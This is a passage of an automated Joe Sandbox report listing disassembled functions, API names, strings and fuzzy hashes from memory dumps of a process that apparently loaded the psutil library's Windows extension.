                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88F012A1F1CA4681EB64DB37E8141796771BF4DB85B856031C98D43768FF2CE5058780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseFreeHandleProcessService$BuildValue
                                                                                                                                                                                                                • String ID: (sk)$continue_pending
                                                                                                                                                                                                                • API String ID: 127882022-3850771874
                                                                                                                                                                                                                • Opcode ID: f5b54f98e23f67648d58909bc3842abce9f1181e0c3c58ee82413d557b5661bf
                                                                                                                                                                                                                • Instruction ID: b2048344f8e8a8c4f796a8b473e5e3d962ea36dda2bd35144c946f2b316c99a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5b54f98e23f67648d58909bc3842abce9f1181e0c3c58ee82413d557b5661bf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36F012A1F1CA46C1EB64DB77E8141796771BF8DB85B856031C98D43768FF2CE5058780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseFreeHandleProcessService$BuildValue
                                                                                                                                                                                                                • String ID: (sk)$stop_pending
                                                                                                                                                                                                                • API String ID: 127882022-1930585124
                                                                                                                                                                                                                • Opcode ID: 48f86efe3eea410b85b2a7612cc24c2edae087b508ce7f4e73f4fa34bf76e174
                                                                                                                                                                                                                • Instruction ID: e9933dd6d5d29fe75f64026d189995e2ac20e7d8ec60082c8f1698eab39591d7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48f86efe3eea410b85b2a7612cc24c2edae087b508ce7f4e73f4fa34bf76e174
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F012A1F1CA46C1EB64DB37E8141796771BF4DB85B856031D98D43768FF2CE5058780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseFreeHandleProcessService$BuildValue
                                                                                                                                                                                                                • String ID: (sk)$running
                                                                                                                                                                                                                • API String ID: 127882022-3389828697
                                                                                                                                                                                                                • Opcode ID: f785410bd87a35ba491306b7248f3a34a7798fdefaf4be69f0a0ea21f0ef00e7
                                                                                                                                                                                                                • Instruction ID: c0ffe22838281fcc1370385512a22c5f76284bb09d2cd21622ceb333265ac703
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f785410bd87a35ba491306b7248f3a34a7798fdefaf4be69f0a0ea21f0ef00e7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F012A1F1CA4681EB64DB37F8141796771BF4DB85B856031C98D53768FF2CE5058780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseFreeHandleProcessService$BuildValue
                                                                                                                                                                                                                • String ID: (sk)$paused
                                                                                                                                                                                                                • API String ID: 127882022-3190322518
                                                                                                                                                                                                                • Opcode ID: 63c88c9a13255999429cdf99a6b252f25d9fc8e75c259dd895562b4c4768fcf9
                                                                                                                                                                                                                • Instruction ID: e0cd7ed5f060a7b707406a690ac9a13b1950c2d3b1af68ba46434f4b1e57834c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63c88c9a13255999429cdf99a6b252f25d9fc8e75c259dd895562b4c4768fcf9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F05EA1F0DA4681EA649B37E8040382770BF4DB84B846031C98D43768FE2CE5058380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseFreeHandleProcessService$BuildValue
                                                                                                                                                                                                                • String ID: (sk)$start_pending
                                                                                                                                                                                                                • API String ID: 127882022-2023969894
                                                                                                                                                                                                                • Opcode ID: 3409c6bf8413084592234efc0b6f05165945dfd4648dc3389cbf111fa97df631
                                                                                                                                                                                                                • Instruction ID: ac09f4ca4732bf68c2cf790e626b6aae9608a02a496ed7f87d98506ee4de45f8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3409c6bf8413084592234efc0b6f05165945dfd4648dc3389cbf111fa97df631
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F082A1F0CA4681EB34DB37E8040382770BF4DB84B846031C98D43768FF2CE5058380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$EnumErr_FromProcessesWindowsmalloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4169093983-0
                                                                                                                                                                                                                • Opcode ID: a8e820127fe32a98a06e698bbe51d4dc5589f7603ff49f3144bf73a0fa82df76
                                                                                                                                                                                                                • Instruction ID: 734c13bdf729072af31d7aaea2c66374740af39d79019600e6b5378a652e6406
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8e820127fe32a98a06e698bbe51d4dc5589f7603ff49f3144bf73a0fa82df76
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7115465B08B4682EB648F73E84413963A1FF8CB81F992035DA8E43B54EE3CD445C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_BuildCallCharCloseDeallocErr_FromFunctionHandleObjectObject_OpenParseProcessTupleUnicode_ValueWidefree
                                                                                                                                                                                                                • String ID: psutil_pid_is_running -> 0
                                                                                                                                                                                                                • API String ID: 3303866948-3467909595
                                                                                                                                                                                                                • Opcode ID: b1211986340a1a8d6553256a51705bfebbaa19623a3658dbd2f4065f9b9c4a43
                                                                                                                                                                                                                • Instruction ID: 28a5a7c1c875b3ea8b59afa48363eead0e06d1f0701de45b1f3fe26b29fa0e25
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1211986340a1a8d6553256a51705bfebbaa19623a3658dbd2f4065f9b9c4a43
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 121187A5B0C94691E7608B76F4442B9A754FF887E4FC01131D9DD46AA8FE6CE085C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CallDeallocErr_FunctionObjectObject___stdio_common_vsprintf
                                                                                                                                                                                                                • String ID: (is)$assume access denied (originated from %s)
                                                                                                                                                                                                                • API String ID: 1805293726-3664638754
                                                                                                                                                                                                                • Opcode ID: 9853c6a794e0137e1bb3e1def5103ace5b3eed4e547d625723e678b78dc0ba75
                                                                                                                                                                                                                • Instruction ID: 0b322a4b5944eddcd577156502616e85f9a2dcc7ab3c9737b00acfef732de682
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9853c6a794e0137e1bb3e1def5103ace5b3eed4e547d625723e678b78dc0ba75
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701DEE1B1894685EE709B36E8513B523A0FF9CB88FC56032CACD87665FE2CE105C784
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CallDeallocErr_FunctionObjectObject___stdio_common_vsprintf
                                                                                                                                                                                                                • String ID: (is)$assume no such process (originated from %s)
                                                                                                                                                                                                                • API String ID: 1805293726-1293061785
                                                                                                                                                                                                                • Opcode ID: 26ab91be43b2a3e59a0fbe3e3e2fb82c101a47abf5a359ff4e6a485339fad67f
                                                                                                                                                                                                                • Instruction ID: 369fe73e927b2589bb1e7211d741e863030951ed6d7f9f2848b541b7a09ef51b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26ab91be43b2a3e59a0fbe3e3e2fb82c101a47abf5a359ff4e6a485339fad67f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C01D2E1B18D4681EE709B32E85137523A0BF9CB84FC56031DA8D47765FE2CD1058784
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD675AD
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9DD67480: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674A9
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9DD67480: NtQuerySystemInformation.NTDLL ref: 00007FFB9DD674D2
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9DD67480: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674E9
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9DD67480: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD674F3
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9DD67480: PyErr_NoMemory.PYTHON3(?,?,?,00007FFB9DD65C74), ref: 00007FFB9DD67501
                                                                                                                                                                                                                • Py_BuildValue.PYTHON3 ref: 00007FFB9DD67809
                                                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6781A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: freemalloc$Arg_BuildErr_InformationMemoryParseQuerySystemTupleValue
                                                                                                                                                                                                                • String ID: kkdddkKKKKKKkKKKKKKKKK
                                                                                                                                                                                                                • API String ID: 1531563548-3509479964
                                                                                                                                                                                                                • Opcode ID: 8eebb1f5d12c4faa77203241ed821083cd36b6e045d6fbd6cc5eb7373a20538e
                                                                                                                                                                                                                • Instruction ID: 7637b981128aad82a29ca7ba60317f9648df08c37ef44e97e80347b7af7dacc4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eebb1f5d12c4faa77203241ed821083cd36b6e045d6fbd6cc5eb7373a20538e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31618176715F898ACA61CB2AE444B99B3A5FF4C780F419231DA8D53B14FF39D045CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastOpenProcess
                                                                                                                                                                                                                • String ID: OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 919517065-2746090705
                                                                                                                                                                                                                • Opcode ID: 795b65efe8bf69edf0fd8c56656d73d7c7458d79a4e1795ab922128e35fd15f7
                                                                                                                                                                                                                • Instruction ID: 2cbbad286d44fb6e5693552df604444378d696040942b924b821d2b49b3720d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 795b65efe8bf69edf0fd8c56656d73d7c7458d79a4e1795ab922128e35fd15f7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85F09690F2A94692EB748777D89003952D1AF5C794FC53035D98EC7BA4FE2CE8D18780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BuildErr_FromPowerStatusSystemValueWindows
                                                                                                                                                                                                                • String ID: iiiI
                                                                                                                                                                                                                • API String ID: 2045901803-2605956832
                                                                                                                                                                                                                • Opcode ID: 88ffeaee8c873da0def5642056156eed6d51202adf4f3f870475aa5b58be7c57
                                                                                                                                                                                                                • Instruction ID: 1b6a99206ec8dc3ebfb663eb757b18ad01a956819581dca971db4c83daf21f44
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88ffeaee8c873da0def5642056156eed6d51202adf4f3f870475aa5b58be7c57
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9F031A1B2C98182EBA0AB32E81116A77A0FF9D704FC02035E6CE42655FE2CD1058B40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2218079540.00007FFB9D871000.00000020.00000001.01000000.00000042.sdmp, Offset: 00007FFB9D870000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218021280.00007FFB9D870000.00000002.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218346156.00007FFB9DB3E000.00000002.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218479944.00007FFB9DC8B000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218528926.00007FFB9DC9B000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218564241.00007FFB9DCA1000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218601582.00007FFB9DCA6000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218641875.00007FFB9DCB5000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218677726.00007FFB9DCBC000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218724327.00007FFB9DCBD000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218760642.00007FFB9DCBE000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218796663.00007FFB9DCBF000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218869059.00007FFB9DCD8000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218913021.00007FFB9DCE7000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2218958553.00007FFB9DCF7000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2219159704.00007FFB9DCF8000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2219322330.00007FFB9DCF9000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2219386831.00007FFB9DCFA000.00000008.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2219500227.00007FFB9DCFD000.00000004.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2219990517.00007FFB9DCFF000.00000002.00000001.01000000.00000042.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9d870000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
                                                                                                                                                                                                                • Instruction ID: 145dd920b89a5d60bdd08783b640b83d20edde591931db7ac83b1c611cce2475
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19a014122a8329d598b8a719417dcd6d526a9fad5fd2adc0fdb65de44e15e28a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25114866B16F018AEB10CF75E8452A833A4FB1C758F440E35EAAD42BA4EF38D1598740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandle$ClearErr_ErrorLastOpenProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2205208866-0
                                                                                                                                                                                                                • Opcode ID: 8ce2344d55d79cf410c1b57ed2bc42e4a7a590aad4ae1116860707e52f61f069
                                                                                                                                                                                                                • Instruction ID: f78104f8f9d1520c3d15b5c193de1c78b4fd9a6e14594be5bcd5ab96698b9b3d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ce2344d55d79cf410c1b57ed2bc42e4a7a590aad4ae1116860707e52f61f069
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8F01CA8F1AA0B92FF7D5B73E46423502916F4DB42F89643CD99E467D0FD2C68898680
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_ErrorFilenameFromStatusWindowsWith
                                                                                                                                                                                                                • String ID: (originated from %s)
                                                                                                                                                                                                                • API String ID: 3439497670-1804376747
                                                                                                                                                                                                                • Opcode ID: 343097d7c65493795a45c95d534faae3237fe2f10a2ccadc5cec81e39ac28d08
                                                                                                                                                                                                                • Instruction ID: cf1d6ae95e4709ae81981274a18ccfba3aa03d8e7afc838d7d70502aa7b57be6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 343097d7c65493795a45c95d534faae3237fe2f10a2ccadc5cec81e39ac28d08
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF044D1B1CA8581EB708B76F45137923A0FF4C798FC06131D6CD8675AED2CD1448784
